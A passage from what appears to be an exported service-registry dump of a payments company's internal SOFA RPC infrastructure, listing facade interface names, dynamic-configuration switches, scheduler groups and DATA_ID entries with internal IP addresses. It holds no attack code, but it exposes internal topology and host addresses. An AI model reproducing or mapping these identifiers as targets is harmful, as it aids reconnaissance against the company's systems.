facade.api.customerrights.ClerkCustomerRightInfoQueryGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilecashier.senior.service.facade.MobilecashierOrderFacade:1.0:ebppcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.pamir.ajax.PamAjaxServiceCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.reportmanage.ReportDefinitionManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.version.DimTableVersionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:minicenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.dataspecial.facade.MobilePaymentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceCheckCallback:1.0:finassistantcore_shitici@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MOBILESECURITY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.CommonOperationOutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.seller.SellerAdmittanceInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_S_1218#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.RelieveOldPunishSwitchResourceImpl.switchVal,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reservecenter.facade.api.InstInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdVersionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.biz.agreement.internal.operation.IRemoteAgreementOperator:1.0:remoteUsageAgreementAuthOperator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlequery.common.service.facade.deposit.api.DepositErrorQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.LogicDbBalanceProfitRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.prize.PcreditActivityCorePrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.FunctionActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.dataphin.openapi.AuthService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fporgassetkeeper@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gftms.facade.api.basic.FundsBalanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.PcreditBearingintProdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:insplatformbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.definriskcenter.facade.api.rule.RuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_rcreportcenter_timeTask#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finpromoscene.common.integration.finbaservice.FinBaserviceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.50.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gsmartcenter.common.service.facade.api.GscSmartServiceFacade:1.0:gscadaudit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:secucommunity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoprod.common.service.facade.autooperate.MerchantPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelink.client.SpannerZoneRouterClient:1.0:alipaymember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyTradeInfoMangeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.64.55#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.risk.RiskDefenseFeedbackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:meshydelivery_commonProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscontentprod.common.service.facade.content.mng.ContentOperationMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.comparacenter.common.service.facade.ComParaShadowDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:mrchiscore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.property.PropertyConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.157.255#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:finquantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.limit.LimitDimValueManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.190.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:amlcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.60.221#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.scienguide.BizRuleManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.DeviceRegisterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.buc.acl.api.service.PermissionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.131.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.65.36#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundmng.common.service.facade.OrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.order.OrderNumGenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.dmp.DmpCrowdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sportsprod.common.service.facade.stat.GlobalStatRzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.itemcore.common.service.facade.v2.ItemPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.security.sandbox.runtime.facade.service.SecuritySandboxExperimentDataFacade:1.0:unique-1000008@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.FinalizeService:1.0:sccounter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.yebscene.gz.YebcPrizeDrawInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.common.service.facade.api.QueryPlanDBFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.TransactionDateCaculateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsaleprod.common.service.facade.api.UnifyGoodsQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couponcore.common.service.service.CouponPublishService:1.0:couponcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.InfoDisclosureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkopermng_processCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.dispatch.ResourceEntityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.offer.OfferTagRelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.91.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insusercenter.facade.asset.api.InsGroupMemberFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.gift.QueryBxPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.ipay.icif.service.facade.api.UserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.chargefront:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocore.common.manager.facade.CampBatchTaskReferenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:asop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.account.api.PointAccountQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.MerchantCommodityQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.metadata.common.service.rest.meta.RestStorageHandlerService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mquery.common.service.facade.report.EnterpriseDepositFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.89.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.cloud.osp.instance.facade.InstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.ifim.biz.cqc.manager.BBCRuleRunAnalysis:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshysale.core.messaging.support.msgbroker.MsgBrokerMessageListenerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcs.cangang.test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.settling.common.service.facade.SettlingCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finassettrade-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.sync.WorkTicketSynchronizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicAppTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.65.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mrchportalcore.common.service.mma.facade.api.dingtalk.DingtalkCorpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.PaymentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.identification.PasswordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:unitestcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.urgentOfflineTagOnSeaViewRoom,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csconfig.common.service.client.CommonConfigQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqResourceDrm.interceptXianZhi,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.171.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.18.65.195#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pucprod.common.service.facade.jiaofei.AdminCommunitySearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:inscommunitybff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:alertLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.common.service.facade.api.PageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.204#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.246.32#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mdiscountprod.common.service.facade.template.api.MerchantTemplateLogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcdmncore.common.service.facade.api.ArchiveCheckTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.115.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dss.dfs.DFSClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.sharing.mng.SharingMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.146.249#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.certifymngTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.mybank.oyz.core.task.facade.callback.TaskLinkageCallback:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:opssla-BFRXATCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudprod.facade.meta.MetaBizDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.4#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pucprod.common.service.facade.ebpp.EbppOweInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.InstitutionDrmResource.repayWithdrawUseSignCardIdSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcardcenter.common.service.facade.api.McardTemplateBenefitQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.ShopMiniAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.audit.AuditTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:fraudmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.137.133#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.team.UserTeamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.service.GraphRollbackService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.app:name=com.alipay.fc.pdcore.core.service.adapter.drm.ProductSaleConfigDrm.offlineProductSaleQueryVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.CheckRecordGradeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.dpmetaportal.common.facade.api.SubjectAPI:1.0:dpmetaportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:meshysale@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.224.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.scenario.api.FixedAnswerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iexratecenter.service.facade.api.ExClientRateMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.ds.common.service.facade.DataSetQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.dmp.DmpTaskProcessorMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbprocess.common.service.facade.callback.ProcessCallback:1.0:eStuffTemplateFinishHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_accountRelationCreateCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpChargeTairRz.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.renderweb:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.materialcenter.common.service.facade.api.material.MaterialQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.biz.blessing.rpc.BlessingH5Rpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITPREREC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_editDrmConfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_HSF_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.yebplus.common.facade.service.api.yebscene.YebcPrizeNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.management.CampBudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.140.63#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pcardsales:name=com.alipay.pcardsales.integration.drm.WaterLevelResource.maxWaterLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdecision.common.service.facade.api.EmergencyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.finfocoreTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixRegex,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.reportSampling,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:publicDomain_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insqa.facade.discount.DiscountCampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.crsociety.api.TrServiceClassFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.126.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizops.facade.StampDetailTranslFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ccmfactory@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.184.173#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbdevice.common.service.facade.device.DeviceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.debittrans.service.facade.zmtrans.api.ZmtransManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.opencore.common.security.drm.LocalSignPrioritySwitchDrm.priority,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.15.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:WWW@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.MaterialManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.common.service.facade.api.RuleNodeCheckerManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_INNOVATE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pushcore.redirect.GzoneRedirectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.common.service.tr.task.TaskStatusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.call.BPCall:1.0:mrchis_submitOrder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finscprod.facade.prophet.GuessPeriodInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.PdSignRuleOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.payflux.spi.BizDispatchServiceFacade:1.0:mobilecodec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchfund.common.service.facade.entrust.api.EntrustPaymentOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestprod.core.service.facade.MockRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxianprod.common.service.facade.ClaimPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.QueryClearBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.budgetcore.core.manage.BudgetManageComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:alice#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.microAcsPayerAccountNoWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.homepage.service.UserHomepageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobileaec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dasbi.daas.api.task.AnalysisTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.version.api.MiniAppVersionOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxrouter.alipayplus.common.service.facade.DirectDebitCalculatorService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.contractOperateDowngradeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_cardConfig@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:fincommonbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_TIMEOUT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.datacontextlib.service.facade.limitcum.consecutive.ConsecutiveClearFacade:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.identifycore.common.service.facade.service.ValidateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promocenter_recruitPlanAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofalearn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.meta:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYBUMNGJSESSIONID.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:frdataaccess@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrepaycenter.common.service.facade.SettingEndowmentFileRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:aldecisionguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mychain.baas.common.user.service.ChainCertFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.SecumngNewsItemFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.72.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-mobilesearch-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ibizdatabatch.biz.service.facade.api.DeclareService:1.0@DEFAULT#@#